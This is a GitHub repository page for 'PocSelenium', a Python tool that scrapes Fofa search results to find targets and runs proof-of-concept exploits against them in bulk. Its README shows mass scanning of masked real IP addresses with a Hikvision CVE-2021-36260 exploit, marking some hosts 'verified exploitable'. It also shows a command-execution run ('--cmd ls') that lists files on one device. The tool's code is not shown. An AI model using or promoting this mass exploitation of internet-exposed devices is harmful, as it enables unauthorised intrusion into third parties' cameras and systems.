Skip to content

s0duku/PocSelenium

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

PocSelenium

Python实现Poc快速测试框架,基于Selenium模拟爬取Fofa目标(可以使用普通会员测试10000+目标),批量测试。

测试

使用hikvision cve-2021-36260 POC 测试

...

[*] Checking remote "***.***.***.***:80"
[i] ETag: "0-a99-1e0"
[+] Remote is not vulnerable (Code: 401)

[*] Checking remote "***.***.***.***:38"
[i] ETag: "0-729-1e0"
[+] Remote is not vulnerable (Code: 401)

[*] Checking remote "***.***.***.***:80"
[i] ETag: "666-746-550a95c4"
[!] Remote is verified exploitable
http://***.***.***.***

[*] Checking remote "***.***.***.***:80"
[i] ETag: "0-11d8-1e1"
[+] Remote is not vulnerable (Code: 401)

[*] Checking remote "***.***.***.***:80"
[i] ETag: "1dc-1e0-587ec4a1"
[-] Could not verify if vulnerable (Code: 500)

[*] Checking remote "***.***.***.***:80"
[-] Cannot establish connection to "***.***.***.***:80"

...

[afl++ 8b4686e283d0] /mnt # python3 test.py --rhost ***.***.***.*** --cmd ls
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
[*] Checking remote "***.***.***.***:80"
[i] ETag: "666-746-550a95c4"
[!] Remote is verified exploitable
N
applib
certs
initrun.sh
pidfile
process
r2_isp_config
sound
webLib

About

Python实现Poc快速测试框架,基于Selenium模拟爬取Fofa目标(可以使用普通会员测试10000+目标),批量测试。

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages